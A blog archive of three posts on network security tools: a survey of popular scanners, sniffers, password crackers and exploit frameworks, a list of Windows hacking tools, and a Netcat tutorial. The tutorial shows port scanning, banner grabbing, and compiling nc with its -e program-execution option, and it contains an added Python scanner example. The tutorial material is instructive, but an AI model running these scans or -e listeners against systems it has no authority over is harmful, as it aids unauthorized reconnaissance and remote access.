3 posts tagged 'Netcat'

  1. 2010.06.23 Top 100 Network Security Tools
  2. 2009.09.11 Top 10 Windows Hacking Tools
  3. 2009.04.01 Netcat (nc): usage and examples
2010.06.23 18:53

Top 100 Network Security Tools

After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.

Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.

Each tool is described by one or more attributes:

new Did not appear on the 2003 list
Rose N / Fell N Popularity ranking rose or fell the given number of places since the 2003 survey
$ Generally costs money. A free limited/demo/trial version may be available.
Linux Works natively on Linux
*BSD Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
OS X Works natively on Apple Mac OS X
Windows Works natively on Microsoft Windows
Command-line interface Features a command-line interface
GUI Interface Offers a GUI (point and click) interface
Source code Source code available for inspection.

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:

#1
$
Linux
*BSD
OS X
Windows
GUI Interface
Nessus : Premier UNIX vulnerability assessment tool
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

See all vulnerability scanners


#2
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Wireshark : Sniffing the glue that holds the Internet together
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

See all packet sniffers


#3
$
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Snort : Everyone's favorite open source IDS
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complementary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.

See all intrusion detection systems


#4
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Netcat : The network Swiss army knife
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact. Other takes on Netcat include OpenBSD's nc, Cryptcat, Netcat6, PNetcat, SBD, and so-called GNU Netcat.

See all Netcats


#5
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Metasploit Framework : Hack the Planet
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

See all vulnerability exploitation tools


#6
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Hping2 : A network probing utility like ping on steroids
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

See all packet crafting tools


#7
Rose 10 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Kismet : A powerful wireless sniffer
Kismet is a console (ncurses) based 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ...

See all wireless tools, and packet sniffers


#8
Fell 3 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Tcpdump : The classic sniffer for network monitoring and data acquisition
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools.

See all packet sniffers


#9
Rose 23 places since 2003
Windows
GUI Interface
Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

See all password crackers, and packet sniffers


#10
Rose 1 place since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.

See all password crackers


#11
Fell 2 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Ettercap : In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

See all packet sniffers


#12
Rose 4 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Nikto : A more comprehensive web scanner
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

See all web vulnerability scanners


#13
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Ping/telnet/dig/traceroute/whois/netstat : The basics
While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with Hping2 and Netcat.

#14
Fell 2 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
OpenSSH / PuTTY / SSH : A secure way to access remote computers
SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin. Dozens of other free and proprietary clients exist. You can explore them here or here.

#15
Rose 35 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap, this release is from the fine folks at THC.

See all password crackers


#16
new
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Paros proxy : A web application vulnerability assessment proxy
A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.

See all web vulnerability scanners


#17
Fell 10 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Dsniff : A suite of powerful network auditing and penetration-testing tools
This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

See all packet sniffers


#18
Rose 7 places since 2003
Windows
GUI Interface
NetStumbler : Free Windows 802.11 Sniffer
Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC.

See all wireless tools, and packet sniffers


#19
Rose 18 places since 2003
Linux
*BSD
OS X
Windows
Command-line interface
Source code
THC Amap : An application fingerprinting scanner
Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC.

See all application-specific scanners


#20
Fell 12 places since 2003
$
Windows
GUI Interface
GFI LANguard : A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect Windows machines' service pack levels, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days.

See all vulnerability scanners


#21
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

See all wireless tools, and password crackers


#22
Fell 4 places since 2003
Windows
GUI Interface
Superscan : A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

See all port scanners


#23
Fell 2 places since 2003
Linux
Command-line interface
Source code
Netfilter : The current Linux kernel packet filter/firewall
Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see Openbsd PF (OpenBSD specific), or IP Filter. Many personal firewalls are available for Windows (Tiny,Zone Alarm, Norton, Kerio, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it.

See all firewalls


#24
new
Windows
Command-line interface
GUI Interface
Sysinternals : An extensive collection of powerful Windows utilities
Sysinternals provides many small Windows utilities that are quite useful for low-level Windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with:
  • ProcessExplorer for keeping an eye on the files and directories open by any process (like LSoF on UNIX).
  • PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
  • Autoruns for discovering what executables are set to run during system boot up or login.
  • RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
  • TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
Update: Microsoft acquired Sysinternals in July 2006, promising that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft removed most of that source code. Future product direction is uncertain.

See all rootkit detectors


#25
Fell 5 places since 2003
$
Windows
GUI Interface
Retina : Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

See all vulnerability scanners



Source: http://sectools.org/

2009.09.11 20:42

Top 10 Windows Hacking Tools

A collection of the best Windows hacking tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
http://www.oxid.it/cain.html

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.
http://www.foundstone.com/index.htm?sub ··· scan.htm

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!
http://www.gfi.com/adentry.asp?adv=814&loc=3

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.
http://www.eeye.com/html/Products/Retina/index.html

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.
http://www.samspade.org/ssw/

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.
http://www.nstalker.com/nstealth/

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test Internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security of Cisco routers with the Router Security Check. The Remote TCP Reset tool remotely displays all active sessions on a device, and Password Decryption can decrypt Type 7 Cisco passwords. The Port Scanner allows testing for open TCP ports across IP address and port ranges or on a selection of specific machines and ports.
http://www.solarwinds.net/

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!
http://www.mavensecurity.com/achilles/

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.
http://foundstone.com/resources/proddes ··· gger.htm

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
http://www.atstake.com/research/tools/n ··· ities/

2009.04.01 19:20

Netcat (nc): usage and examples

Netcat (written nc from here on) is a utility that reads and writes raw data over network connections. Its usage is generally similar to UNIX cat, but where cat reads from and writes to files, nc reads from and writes to a network connection. Combined with scripts this makes it a very convenient debugging and testing tool for networks; on the other hand, its scope for use in hacking is just as wide.

Options
--------------------------------------------------------------------------

usage: nc [options] [target host] [ports]

-n : take host names and ports as numbers only (no DNS lookups).

-v : increase verbosity; more information is printed.

-o [filename]: write a hex dump of all data sent and received to the file.

-u : make a UDP connection instead of a TCP one.

-p [port number or name]: specify the local port. Mostly used together with -l.

-s [ip address or DNS]: specify the local IP address. Not supported on every platform.

-l : start nc in listen mode. Naturally no target host is given. Used together with -p; this is how nc is run as a server.

-e [filename]: available only when nc was built with -DGAPING_SECURITY_HOLE.
Executes the file once a connection is established. Combined with -l it behaves like a single-instance inetd.

-t : available only when compiled with -DTELNET. Answers telnet option negotiation on connect so that you can talk to a telnetd.

-i [interval time]: nc normally moves data in 8K chunks; with this option it instead sends standard input one line at a time, pausing interval seconds between lines (and between ports when scanning).

-w [seconds]: timeout for connects and for the final network read. The examples below use it; see the nc -h output further down.

-z : send no data beyond what is needed to establish the connection (zero-I/O mode, used for scanning).

-r : when several ports are given, randomize the scan order (by default a range is scanned from the highest port down) and also randomize the local port that -p would otherwise fix. Note that an explicit -p overrides -r.

-g [gateway]: loose source-routing hop point(s), up to 8. (The original author left this as "??"; this is what nc -h says about it.)

-G [num]: source-routing pointer: 4, 8, 12, ... (Likewise from nc -h.)

Using
--------------------------------------------------------------------------

multi-port connection

nc can open several connections to one host in a single invocation; several ports are given like this:
nc [target host] 20-30

The data read from standard input is then sent to each of those ports.

port scanning

You can find out which ports within a given range on the target host are in use, and how.
nc -v -w 3 -z sparcs.kaist.ac.kr 20-30, 70-90

The command above reports on ports 20-30 and 70-90 as follows:

sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open

For more detail than that, run

echo QUIT | nc -v -w 3 [target host] [ports]

and the responses and error messages give you version information and the like.

[songa@sparcs.kaist.ac.kr] ~ 13 echo QUIT | nc -v -w 3 sparcs 20-30, 70-90
sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
220 sparcs.kaist.ac.kr ESMTP Sendmail 8.8.7/8.8.7; Fri, 8 Jan 1999 15:21:36
+0900
221 sparcs.kaist.ac.kr closing connection
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
220 sparcs.kaist.ac.kr FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3
19:17:20 EDT 1998) ready.
221 Goodbye.
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
finger: QUIT: no such user.
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open


simple data transfer agent

nc can be used for simple data transfers (start the receiver first).
receiver : nc -l -p 1234 | uncompress -c | tar xvfp -

sender : tar cfp - /some/dir | compress -c | nc -w 3 othermachine 1234


substitute of inetd

With nc you can test a network program without registering it in inetd and without any other network setup:
nc -l -p [port] -e [filename]


/* test.c */
#include <stdio.h>

/* With -e, the client's request arrives on stdin and whatever we print goes
   back down the connection. Read one byte of the request, answer, exit. */
int main(void)
{
    getchar();
    printf("<html><head></head><body>haha</body></html>\n");
    return 0;
}


Compile it (cc -o test test.c) and run:

nc -l -p 1234 -e test

Done this way it even serves as a throwaway web server.

connection redirecting
By editing inetd.conf in the following form you can redirect a service to another server (inetd requires a user field between nowait and the server path; the original line omitted it, and nobody is used here as in the second copy of this example later on):

www stream tcp nowait nobody /etc/tcpd /bin/nc -w 3 zero 80

This redirects the http service of the current server to the server zero.

performance testing

By sending and receiving large amounts of data with nc you can test network performance.
[songa@sparcs.kaist.ac.kr] /etc 31 > yes AAAA | nc -v -v -l -p 1234 > /dev/null &
[1] 3258 3259
[songa@sparcs.kaist.ac.kr] /etc 32 > listening on [any] 1234 ...
[songa@sparcs.kaist.ac.kr] /etc 32 >
[songa@sparcs.kaist.ac.kr] /etc 32 >
[songa@sparcs.kaist.ac.kr] /etc 32 > yes BBBB | nc sparcs 1234 > /dev/null &
[2] 3475 3476
[songa@sparcs.kaist.ac.kr] /etc 33 > connect to [143.248.8.2] from sparcs.kaisac.kr
[143.248.8.2] 31844
[songa@sparcs.kaist.ac.kr] /etc 33 > kill %
[songa@sparcs.kaist.ac.kr] /etc 34 > sent 23470080, rcvd 21675480





And

http://www.wowhacker.com/BoArD/view.php?id=abc_lecture&page=1&category=&sn=off&ss=on&sc=on&keyword=netcat&select_arrange=headnum&desc=asc&no=152

has more.

The document from here on

was written by Oprix of http://security.xmecca.com





Netcat == nc

You may use this document anywhere as long as you credit the source (http://security.xmecca.com).
A note on the BBS would be appreciated as well.

A partial translation of the Netcat ReadMe.
===========================================================

Netcat (nc for short) can be obtained from http://www.l0pht.com/users/10pht/nc110.tgz.

Netcat is a program written to read and write data across TCP or UDP network connections.
It was built specifically as a "back-end" tool for use from shell scripts and other programs.
At the same time it is a tool for debugging and exploring networks, with several interesting kinds of connection built in.
The program itself is actually named nc.
It has long been one of those obscure-but-standard UNIX tools. (Has it, though? -_-;;)

In the simplest use, "nc host port" makes a TCP connection to the given port on the given host, then
sends your standard input to the far end and prints on standard output whatever comes back over the
connection. This continues until one side of the connection shuts down. Unlike most other programs,
which exit as soon as they see end-of-file on standard input, it keeps running.

NetCat can also be used as a server: it can wait for incoming connections on a port you specify.

It can do the same over UDP, which is less reliable than TCP and on some
systems cannot carry much data, but is useful at times.

The representative things NetCat can do are:

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Hex dump of transmitted and received data
Optional ability to let another program service established connections
Optional telnet-options responder

That is the list. (Translate these yourselves.)

How to build

Get it from http://www.l0pht.com/users/10pht/nc110.tgz.

Unpack it.

There is nothing special to configure,

except that it matters to add -DGAPING_SECURITY_HOLE to the Makefile.
Without it the useful (and dangerous) -e option is not available.

### HARD TARGETS

nc: netcat.c
	$(LD) $(DFLAGS) $(XFLAGS) $(STATIC) -DGAPING_SECURITY_HOLE -o nc netcat.c $(XLIBS)

After that change, make linux builds it.

Before trying it, look at the help:

$ ./nc -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound:   nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this help
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic to file
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
-v verbose output
-w secs timeout: quit secs after the final read
-z zero-I/O mode: send no data [used for scanning]
Ports can be given individually or as ranges: low-high




It can be used as a simple scanning tool.

$ echo QUIT | nc -v -w 5 localhost 25-100
localhost.localdomain [127.0.0.1] 25 (smtp) open
220 s210-219-158-88.thrunet.ne.kr ESMTP Sendmail 8.9.3/8.9.3; Thu, 31 May 2001 00:30:34 +0900
221 s210-219-158-88.thrunet.ne.kr closing connection

$ nc -v -w 5 localhost 25-100 shows only the open ports, without the banners.
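The port scan and banner grab shown in both posts (nc -v -w 3 -z host 20-30, 70-90 and echo QUIT | nc -v -w 3 host ports), reproduced with Python sockets so that it runs without nc installed. This is an added example, not code from the original posts or from Netcat itself: probe() is the -z / -w / piped-QUIT behaviour for one port, parse_ports() walks nc's range syntax (high port first within each range, as the transcripts show), and start_fake_smtp() is a constructed loopback stand-in for the mail server in the transcripts, so the demo never touches a real host. The function names and the fake banner text are my assumptions.

```python
import socket
import threading


def parse_ports(spec):
    """Expand nc-style port specs such as '20-30, 70-90' or '25'.
    Like the original nc, each range is walked from the high port down."""
    ports = []
    for part in spec.replace(",", " ").split():
        lo, _, hi = part.partition("-")
        lo, hi = int(lo), int(hi or lo)
        ports.extend(range(hi, lo - 1, -1))
    return ports


def probe(host, port, timeout=3.0, payload=None, max_bytes=512):
    """One probe of host:port, as `nc -v -w <timeout> host port` does it.

    payload=None behaves like -z: connect, send nothing, close.
    Otherwise the payload is written (the `echo QUIT |` trick) and whatever
    the service answers before it closes, or before it stays silent for
    `timeout` seconds, is returned.  Result: (port, is_open, banner_bytes)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if payload is None:
                return (port, True, b"")
            s.sendall(payload)
            chunks, total = [], 0
            try:
                while total < max_bytes:
                    buf = s.recv(max_bytes - total)
                    if not buf:            # peer closed, e.g. after "221 closing"
                        break
                    chunks.append(buf)
                    total += len(buf)
            except socket.timeout:         # -w expired with the peer still silent
                pass
            return (port, True, b"".join(chunks))
    except OSError:                        # refused, unreachable, or connect timed out
        return (port, False, b"")


def scan(host, spec, timeout=3.0, payload=None):
    """Return only the open ports, in nc's scan order, with any banners."""
    results = (probe(host, p, timeout, payload) for p in parse_ports(spec))
    return [r for r in results if r[1]]


# --- constructed stand-in for a remote service, so the demo runs offline ---
def start_fake_smtp(banner=b"220 example.test ESMTP (constructed)\r\n"):
    """Listen on an ephemeral loopback port, greet each client with `banner`,
    read one line, answer '221 Bye' and hang up.  Returns (port, stop)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)                    # lets the loop notice stop_flag
    stop_flag = threading.Event()

    def serve():
        while not stop_flag.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.settimeout(2.0)
                    conn.sendall(banner)
                    conn.recv(64)          # the QUIT line; nothing for a -z probe
                    conn.sendall(b"221 Bye\r\n")
                except OSError:            # client hung up early (a -z probe does)
                    pass
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()

    def stop():
        stop_flag.set()
        t.join()

    return srv.getsockname()[1], stop


if __name__ == "__main__":
    port, stop = start_fake_smtp()
    for p, _, banner in scan("127.0.0.1", f"{port}", timeout=2, payload=b"QUIT\r\n"):
        print(f"127.0.0.1 {p} open", banner.decode(errors="replace").strip())
    stop()
```

A -z probe only proves that the TCP handshake completes; the banner step is what tells you what is actually listening, and on a host you do not own both the connection and the QUIT line will appear in the service's log. Note also that -w bounds both the connect and the final read, so a service that accepts and then stays silent costs the full timeout per port.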

It is also used for file transfer (start the receiving side first).

Sending side
$ cat html.tgz | nc -w 3 x.x.x.x 1234

Receiving side
$ nc -l -p 1234 > html.tgz

It can serve as a simple firewall, or more precisely a port forwarder.

In inetd.conf

[realwww is the address of the real web server]

www stream tcp nowait nobody /etc/tcpd /bin/nc -w 3 realwww 80

Network performance measurement

Tried in both orders (each side once as listener, once as connector).

Server A
$ yes BBBBBBBBBBBBBBBBBBBBBB | /tmp/nc x.x.x.x 2222 > /dev/null
Broken pipe
$ yes AAAAAAAAAAAAAAAAAAAAAA | /tmp/nc -v -v -l -p 2222 > /dev/null
listening on [any] 2222 ...
connect to [x.x.x.x] from x.x.x.x [x.x.x.x] 2790
sent 6643712, rcvd 9542784

A received more than it sent

Server B
$ yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null
listening on [any] 2222 ...
203.239.110.12: inverse host lookup failed: Unknown host
connect to [x.x.x.x] from (UNKNOWN) [x.x.x.x] 1672
sent 11145216, rcvd 8092008
$ yes BBBBBBBBBBBBBBBBBBBBBB | nc x.x.x.x 2222 > /dev/null
Broken pipe

B sent more than it received

Sending log data

From a shell script you can also send log messages. This is a syslog datagram; <38> is the priority, facility auth (4) times 8 plus severity info (6).

echo '<38>message' | nc -w 1 -u loggerhost 514
